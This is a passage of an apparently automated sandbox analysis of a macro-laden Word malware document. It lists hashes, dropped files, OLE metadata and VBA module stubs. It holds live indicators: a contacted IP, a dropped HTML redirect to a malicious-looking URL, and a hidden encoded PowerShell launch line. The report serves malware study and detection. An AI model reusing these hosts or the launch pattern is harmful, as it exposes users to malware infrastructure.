3b5074b1b5d032e5620f69f9f700ff0e | SecuriteInfo.com.Trojan.GenericKD.36452518.2355.exe | malicious
• 107.180.2.185
3b5074b1b5d032e5620f69f9f700ff0e | SecuriteInfo.com.W32.AIDetect.malware2.12561.exe | malicious
• 107.180.2.185
3b5074b1b5d032e5620f69f9f700ff0e | SecuriteInfo.com.W32.AIDetect.malware2.17251.exe | malicious
• 107.180.2.185
3b5074b1b5d032e5620f69f9f700ff0e | unpacked.exe | malicious
• 107.180.2.185
3b5074b1b5d032e5620f69f9f700ff0e | WknSFDcbckSWaOKzgGLUFEXl.exe | malicious
• 107.180.2.185

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\EBBBFCCB-40A6-407F-8E1B-936E8948873B
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 133001
Entropy (8bit): 5.376739745523053
Encrypted: false
SSDEEP: 1536:1cQceNquBXA3gBwJpQ9DQW+zA9H34ZldpKWXboOilXNErLdRE9:BcQ9DQW+zUXi0
MD5: 068DD2137AFF2EB9116089CF2D2EAFE9
SHA1: 8B3C10793DBAF0D5588D6DF555F27B8E56CF2386
SHA-256: 8F7356E8A92A0B88C0D61EDBF7F5B3B727D671199B6EC644E5554DBE8AE89806
SHA-512: B51EB3D57D05875C74292CCD83917EF8FE8591D40207EB8E081655FC0C91454278A1DB8B69163246CABBFB28E3E5569CC7ACCFDE49BBD85883B7D8CA3C28241F
Malicious: false
Reputation: low
                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-03-16T13:26:54">.. Build: 16.0.13915.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{42576B78-1BBE-4166-930A-DE1BE0BE8F85}.tmp
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 1536
Entropy (8bit): 1.3708412074519778
Encrypted: false
SSDEEP: 6:Iiiiiiiiii8l+4d5NFc8++lNi1mULKteKeMUKa:23d5XG+3iBWJeVKa
MD5: 385EA8A7B8F77428AD84E365306356FB
SHA1: F2347F9B17E0DE1EEA3DD1CC630F2ED8C64AB9C7
SHA-256: EFC25ECE3F9F704CA4788A67FB8F06D140506D7B76D14A6968ABD51471746D28
SHA-512: C3143C891271F23B6B454162128F51AD3CB14086EBD340C6D5F40BB719B7DD0BA8C8F1FF71BCE6995B38037CE758EBBF459507BC91096583334D399410C85E3D
Malicious: false
Reputation: low
                                                                                                                        Preview: ..(...(...(...(...(...(...(...(...(...(...(...p.r.a.t.e.s.h...p....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......>...B...............................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{C583EF00-E796-4BD3-951E-1A83100D3950}.tmp
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 1024
Entropy (8bit): 0.05390218305374581
Encrypted: false
SSDEEP: 3:ol3lYdn:4Wn
MD5: 5D4D94EE7E06BBB0AF9584119797B23A
SHA1: DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256: 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512: 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious: false
Reputation: high, very likely benign file
                                                                                                                        Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 11606
Entropy (8bit): 4.883977562702998
Encrypted: false
SSDEEP: 192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
MD5: 1F1446CE05A385817C3EF20CBD8B6E6A
SHA1: 1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
SHA-256: 2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
SHA-512: 252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
Malicious: false
Reputation: high, very likely benign file
                                                                                                                        Preview: PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 1196
Entropy (8bit): 5.333915035046385
Encrypted: false
SSDEEP: 24:3aZPpQrLAo4KAxX5qRPD42HOoSCvKDe9tOBPnKdSl9Kd:qZPerB4nqRL/HvSCv4e9tOBfuuKd
MD5: 90952CC8376AB2A92C41C4E1AC5A8B57
SHA1: C3C4B5A3F60A333148432949A7FDFEDEDEBD48A2
SHA-256: 35F348406AEC4AB2875FB5A3AFAC3B5A5870339559B79989F822DF3CBCEAF0C2
SHA-512: 870A7B8D82D37A9A332BCC12DF5937193AD0C53F6CAF06BD2967F03888199A8907DE72A5862607354D49ECAE7B53146DB1392F078AD82CC09C9C8ED647C861D7
Malicious: false
Reputation: low
                                                                                                                        Preview: @...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.<................):gK..G...$.1.q........System.ConfigurationH................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.P...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementD..................-.D.F.<;.nt.1........System.Configuration.Ins
C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 170164
Entropy (8bit): 4.366241318145334
Encrypted: false
SSDEEP: 1536:fEPx2LzolWWpFpKKHAeedydju4HTbTuo+o5aQxJudUl9yhQL3oKmmy:fo2g8WpFpKKHHedydFeo+oQLUlPoK0
MD5: 5027EDCEBD0DD691F25701ABDBDCE6CD
SHA1: 0BD6A6FD3E4217ACA927F7E6E8CDCD022DC0B6D0
SHA-256: 3573A2AE830F9E5122975DB59988E29A66DE3FB8D48F2D16F43B85356D6BA307
SHA-512: 00D824EBE5ECDE8400556255A0B860B06732329C36D2FAD352FFA72D7267BBC3D344AFA54F81F081E41FB2586E24D72A9B4B9B12B9D3E628D1EB21E2D9E5A468
Malicious: false
Reputation: low
                                                                                                                        Preview: MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8...8...9..l9...9..4:...:...:..`;...;..(<...<...<..T=...=...>...>...>..H?...?...@..t@...@..<A...A...B..hB.......l...B..........................$................................................ ...............................x...I..............T........................................... ...................................................
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0g034pjb.mj1.ps1
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_re1hxyqi.cvu.psm1
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Adjunto K_23165.LNK
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 13:47:13 2020, mtime=Tue Mar 16 20:26:54 2021, atime=Tue Mar 16 20:26:50 2021, length=217088, window=hide
Category: dropped
Size (bytes): 2170
Entropy (8bit): 4.7186850424774365
Encrypted: false
SSDEEP: 24:8harYOAoKBC9SDyd/H7aB6myharYOAoKBC9SDyd/H7aB6m:8harYVoKBCgB6pharYVoKBCgB6
MD5: 2E03BE37F0ABA958A7DF68D0C627871C
SHA1: D470FC25AD6B99ECEACE3F6C2CDE6469C18C2703
SHA-256: A8EDAAC87E0061E65C73D19AB093E050290E1516EA34310C45AB7D5AE5F7472C
SHA-512: 382222BA7220AD4D02ED77D5CDC2F6B58A4C77013B77DF1C8729183B6B564FC6158B0243527C9D3CE7CC0408C567F6D075A4B8105294D2632469312C863A373B
                                                                                                                        Malicious:false
                                                                                                                        Preview: L..................F.... .......8.....l..............P...........................P.O. .:i.....+00.../C:\...................x.1......Ng...Users.d......L..pRT.....................:......B..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....T.1.....>Q.u..user..>.......NM.pRT......S........................a.l.f.o.n.s.....~.1.....>Q.u..Desktop.h.......NM.pRT......Y..............>..... b..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....t.2..P..pRZ. .ADJUNT~1.DOC..X......>Q.upRZ.....f.....................H...A.d.j.u.n.t.o. .K._.2.3.1.6.5...d.o.c.......Z...............-.......Y...........>.S......C:\Users\user\Desktop\Adjunto K_23165.doc..*.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.A.d.j.u.n.t.o. .K._.2.3.1.6.5...d.o.c.........:..,.LB.)...Aw...`.......X.......066656...........!a..%.H.VZAj...jXt.+........W...!a..%.H.VZAj...jXt.+........W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.
                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):83
                                                                                                                        Entropy (8bit):4.582492148951102
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:M1XnHZC8BPenHZCmX1XnHZCv:MhHZ7WHZ5HZs
                                                                                                                        MD5:EB2F875315EE4BA70A4E9286BD866CB0
                                                                                                                        SHA1:8F0A2AC7FD7C5A8A3B29752B4B67D72064465457
                                                                                                                        SHA-256:86652D4C55B76A8315B34F5D74939A801A5537E856263F30C88E5FD552C2DC4F
                                                                                                                        SHA-512:2B05F7B5CBFEEC72EE6F4E4E0231D2A63133C3865A41F73BFD3BF46E068FAD71925C6BD9FD4D492A6440E06C73CF8FC259FBD2EAFBA95E00081144BD3D77BC62
                                                                                                                        Malicious:false
                                                                                                                        Preview: [doc]..Adjunto K_23165.LNK=0..Adjunto K_23165.LNK=0..[doc]..Adjunto K_23165.LNK=0..
                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):162
                                                                                                                        Entropy (8bit):2.247037839680148
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:Rl/ZdiY0H////9MW/1lqKLRwMzr:RtZgpKQrr
                                                                                                                        MD5:9BA8B4E73E2592F7E99C8702297F666F
                                                                                                                        SHA1:1438AD24C1442420AF45C0EF74DA9D798AAD9F93
                                                                                                                        SHA-256:85F61B0A2C031883E444D92092DB7B366BBE901E3E2E54197AE8B78251E934AC
                                                                                                                        SHA-512:FE3A42B904E3E340EF3CF67D5D9FB3479B193CBB479E8E9B36E799743DD2FD59263FAC1C7916B095A030C84C52561DA10E49042A58F09D888D5710D6B8E81364
                                                                                                                        Malicious:false
                                                                                                                        Preview: .pratesh................................................p.r.a.t.e.s.h............u.'.............................u.(..........T.......6C.........u.)..........$...
                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                        File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):22
                                                                                                                        Entropy (8bit):2.9808259362290785
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:QAlX0Gn:QKn
                                                                                                                        MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                        SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                        SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                        SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                        Malicious:false
                                                                                                                        Preview: ....p.r.a.t.e.s.h.....
                                                                                                                        C:\Users\user\Desktop\~$junto K_23165.doc
                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):162
                                                                                                                        Entropy (8bit):2.247037839680148
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:Rl/ZdiY0H////9MW/1lqKLRwMzr:RtZgpKQrr
                                                                                                                        MD5:9BA8B4E73E2592F7E99C8702297F666F
                                                                                                                        SHA1:1438AD24C1442420AF45C0EF74DA9D798AAD9F93
                                                                                                                        SHA-256:85F61B0A2C031883E444D92092DB7B366BBE901E3E2E54197AE8B78251E934AC
                                                                                                                        SHA-512:FE3A42B904E3E340EF3CF67D5D9FB3479B193CBB479E8E9B36E799743DD2FD59263FAC1C7916B095A030C84C52561DA10E49042A58F09D888D5710D6B8E81364
                                                                                                                        Malicious:false
                                                                                                                        Preview: .pratesh................................................p.r.a.t.e.s.h............u.'.............................u.(..........T.......6C.........u.)..........$...
                                                                                                                        C:\Users\user\Documents\20210316\PowerShell_transcript.066656.EGeR7x3C.20210316142701.txt
                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):11698
                                                                                                                        Entropy (8bit):5.0834906881041535
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:90c7SR0Ix0410SON2MUWyh8Xljk781VM7iIgTZ/QLeyE6:uN0ItwUWyh8XljFmas
                                                                                                                        MD5:FA40150A55C67E14C13BBA8805431F13
                                                                                                                        SHA1:7F2FADE7EC73E43EC8A32A1AC0CCF0B576DF452A
                                                                                                                        SHA-256:F887B22DE61D8781963B1E8563211E00F3CC5B0415D8B8CCCBEFAB98FF91A7DC
                                                                                                                        SHA-512:D75ABC064AC7D8193634523F3BCE1DB11D24D4353439750D51D00215649196A347C9831D8A5A04551346C1A4AB076A2D5E91635FED612A3E2ED73F55C1BFE1CE
                                                                                                                        Malicious:false
                                                                                                                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20210316142702..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 066656 (Microsoft Windows NT 10.0.17134.0)..Host Application: POwersheLL -w hidden -ENCOD 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
                                                                                                                        C:\Users\user\Y559jsv\Iewfmy3\Ppnq9j.dll
                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:HTML document, ASCII text, with very long lines, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):495
                                                                                                                        Entropy (8bit):5.8487179314091335
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:kxvsCk9cE3Mx04K20/XPJu5zprCCmyIm5vYI:kbxx0n/MNprI5I
                                                                                                                        MD5:DCA39B99B5F73AC11242CAEBF9C128EF
                                                                                                                        SHA1:924107ABF24814B1AE8FDB78A92A6E5241B3B281
                                                                                                                        SHA-256:3E5E72217461C0DC771D22F20DE3988D61CCD99372AE15E3617747A639AC6478
                                                                                                                        SHA-512:A1FF24DD5992BDF1E11F6689379D77933A4501EA0DC77704DE1D7A1147168A0B84D9F86209FEE92EA7C95E80054A609A0108A3CD723BE1CC02D8EF05AD645808
                                                                                                                        Malicious:false
                                                                                                                        Preview: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://tongdaihanoi.com/847346324234234/rpnvXm/?js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTYxNTkwODQzNSwiaWF0IjoxNjE1OTAxMjM1LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIycG1kYjc1MjZnZmhramd1cTAwMjFrZWgiLCJuYmYiOjE2MTU5MDEyMzUsInRzIjoxNjE1OTAxMjM1MDMyMDU0fQ.LHdzXg5j7a2-JS_hssSxOCyt6EVRpCu2dN3xaLXQPO4&sid=529043ec-865b-11eb-ad9b-19c8d4ec230d');</script></body></html>

                                                                                                                        Static File Info

                                                                                                                        General

                                                                                                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: Communications transmit paradigms Liaison Walks Orchestrator Crossroad middleware, Author: Tom Lecomte, Template: Normal.dotm, Last Saved By: Axel Roche, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Dec 22 15:41:00 2020, Last Saved Time/Date: Tue Dec 22 15:41:00 2020, Number of Pages: 1, Number of Words: 4420, Number of Characters: 25200, Security: 8
                                                                                                                        Entropy (8bit):6.40728300890308
                                                                                                                        TrID:
                                                                                                                        • Microsoft Word document (32009/1) 79.99%
                                                                                                                        • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                                                                                                        File name:Adjunto K_23165.doc
                                                                                                                        File size:216755
                                                                                                                        MD5:0687dd1c4250049abd4c224485512ffd
                                                                                                                        SHA1:ec31df47e6c68125b5bdc9355ee5abd23d82fdbe
                                                                                                                        SHA256:6cb7ee70743f849d9c174fb6b6d672b11d7dcb0f208f869f58deb7956119500e
                                                                                                                        SHA512:5a5df7facbb9d515c33e1c09c814dc13209a82326e6c490bb492c1c01e36adbab4a4848087b6107a90dfee30c84f93d895d4560ba68613176f37412aa5e38213
                                                                                                                        SSDEEP:6144:19ufsfgIf0pLIptEZiGDDCdRG9DjpmDtdS:7ufsoIfUwtEoGDDCdRG9DjpmDtdS
                                                                                                                        File Content Preview:........................>.......................#...........&............... ...!..."...|......................................................................................................................................................................

                                                                                                                        File Icon

                                                                                                                        Icon Hash:74f4c4c6c1cac4d8

                                                                                                                        Static OLE Info

                                                                                                                        General

                                                                                                                        Document Type:OLE
                                                                                                                        Number of OLE Files:1

                                                                                                                        OLE File "Adjunto K_23165.doc"

                                                                                                                        Indicators

                                                                                                                        Has Summary Info:True
                                                                                                                        Application Name:Microsoft Office Word
                                                                                                                        Encrypted Document:False
                                                                                                                        Contains Word Document Stream:True
                                                                                                                        Contains Workbook/Book Stream:False
                                                                                                                        Contains PowerPoint Document Stream:False
                                                                                                                        Contains Visio Document Stream:False
                                                                                                                        Contains ObjectPool Stream:
                                                                                                                        Flash Objects Count:
                                                                                                                        Contains VBA Macros:True

                                                                                                                        Summary

                                                                                                                        Code Page:1252
                                                                                                                        Title:
                                                                                                                        Subject:Communications transmit paradigms Liaison Walks Orchestrator Crossroad middleware
                                                                                                                        Author:Tom Lecomte
                                                                                                                        Keywords:
                                                                                                                        Comments:
                                                                                                                        Template:Normal.dotm
                                                                                                                        Last Saved By:Axel Roche
                                                                                                                        Revision Number:1
                                                                                                                        Total Edit Time:0
                                                                                                                        Create Time:2020-12-22 15:41:00
                                                                                                                        Last Saved Time:2020-12-22 15:41:00
                                                                                                                        Number of Pages:1
                                                                                                                        Number of Words:4420
                                                                                                                        Number of Characters:25200
                                                                                                                        Creating Application:Microsoft Office Word
                                                                                                                        Security:8

                                                                                                                        Document Summary

                                                                                                                        Document Code Page:1252
                                                                                                                        Number of Lines:210
                                                                                                                        Number of Paragraphs:59
                                                                                                                        Thumbnail Scaling Desired:False
                                                                                                                        Company:
                                                                                                                        Contains Dirty Links:False
                                                                                                                        Shared Document:False
                                                                                                                        Changed Hyperlinks:False
                                                                                                                        Application Version:786432

                                                                                                                        Streams with VBA

                                                                                                                        VBA File Name: Bj7zc5k612ib, Stream Size: -1
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Bj7zc5k612ib
                                                                                                                        VBA File Name:Bj7zc5k612ib
                                                                                                                        Stream Size:-1
                                                                                                                        Data ASCII:
                                                                                                                        Data Raw:

                                                                                                                        VBA Code Keywords

                                                                                                                        Keyword
                                                                                                                        False
                                                                                                                        VB_Exposed
                                                                                                                        Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived
VBA Code
Attribute VB_Name = "Bj7zc5k612ib"
Attribute VB_Base = "0{53E03B9E-2218-45B6-85A2-C47D984847B8}{DECDBE84-7493-4018-BC88-15CC72351445}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
VBA File Name: Hiuk_v7ho95scpn0j, Stream Size: -1
General
Stream Path: Macros/Hiuk_v7ho95scpn0j
VBA File Name: Hiuk_v7ho95scpn0j
Stream Size: -1
Data ASCII:
Data Raw:
VBA Code Keywords: VB_Creatable, False, VB_Exposed, Attribute, VB_Name, VB_PredeclaredId, VB_GlobalNameSpace, VB_Base, VB_Customizable, VB_TemplateDerived
VBA Code
Attribute VB_Name = "Hiuk_v7ho95scpn0j"
Attribute VB_Base = "0{DCA2A5D6-E131-4DDA-895B-3E9822E93650}{59CEE0E1-26C4-4583-B7FF-9510385F9059}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
VBA File Name: Hvp1hxwgx78q8fg4, Stream Size: -1
General
Stream Path: Macros/Hvp1hxwgx78q8fg4
VBA File Name: Hvp1hxwgx78q8fg4
Stream Size: -1
Data ASCII:
Data Raw:
VBA Code Keywords: False, VB_Exposed, Attribute, VB_Name, VB_Creatable, VB_PredeclaredId, VB_GlobalNameSpace, VB_Base, VB_Customizable, VB_TemplateDerived
VBA Code
Attribute VB_Name = "Hvp1hxwgx78q8fg4"
Attribute VB_Base = "0{C2BABB20-D2C4-427C-9EDB-4620FFEE0F8C}{14D3B583-866E-4040-A821-3D821B8C0F73}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
VBA File Name: Pkebr_y5xjd5hl070, Stream Size: -1
General
Stream Path: Macros/Pkebr_y5xjd5hl070
VBA File Name: Pkebr_y5xjd5hl070
Stream Size: -1
Data ASCII:
Data Raw:
VBA Code Keywords: False, VB_Exposed, Attribute, VB_Name, VB_Creatable, VB_PredeclaredId, VB_GlobalNameSpace, VB_Base, VB_Customizable, VB_TemplateDerived
VBA Code
Attribute VB_Name = "Pkebr_y5xjd5hl070"
Attribute VB_Base = "0{9D897C48-94D7-48BA-981A-540C527DFECB}{D1114CBA-B9B7-4991-84EB-5C5DD038E3F9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
VBA File Name: Seby_rq4k8mp, Stream Size: -1
General
Stream Path: Macros/Seby_rq4k8mp
VBA File Name: Seby_rq4k8mp
Stream Size: -1
Data ASCII:
Data Raw:
VBA Code Keywords: False, Attribute, VB_Name, VB_Creatable, VB_PredeclaredId, VB_GlobalNameSpace, VB_Base, VB_Customizable, VB_TemplateDerived, VB_Exposed
VBA Code
Attribute VB_Name = "Seby_rq4k8mp"
Attribute VB_Base = "0{8C08A6E4-D61D-4DFA-9005-995F3C6B461B}{AB11852B-4BC8-48EF-B786-4176F752DCC1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
VBA File Name: U2v6aydkxz3, Stream Size: -1
General
Stream Path: Macros/U2v6aydkxz3
VBA File Name: U2v6aydkxz3
Stream Size: -1
Data ASCII:
Data Raw:
VBA Code Keywords: False, VB_Exposed, Attribute, VB_Name, VB_Creatable, VB_PredeclaredId, VB_GlobalNameSpace, VB_Base, VB_Customizable, VB_TemplateDerived
VBA Code
Attribute VB_Name = "U2v6aydkxz3"
Attribute VB_Base = "0{9EF41C7F-4993-4380-9AE2-6D1717463F09}{19CB9157-FC90-46F3-9DB5-DA54BE1A1A95}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
VBA File Name: Avi6wp3s89lev, Stream Size: 700
General
Stream Path: Macros/VBA/Avi6wp3s89lev
VBA File Name: Avi6wp3s89lev
Stream Size: 700
                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . L . f . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
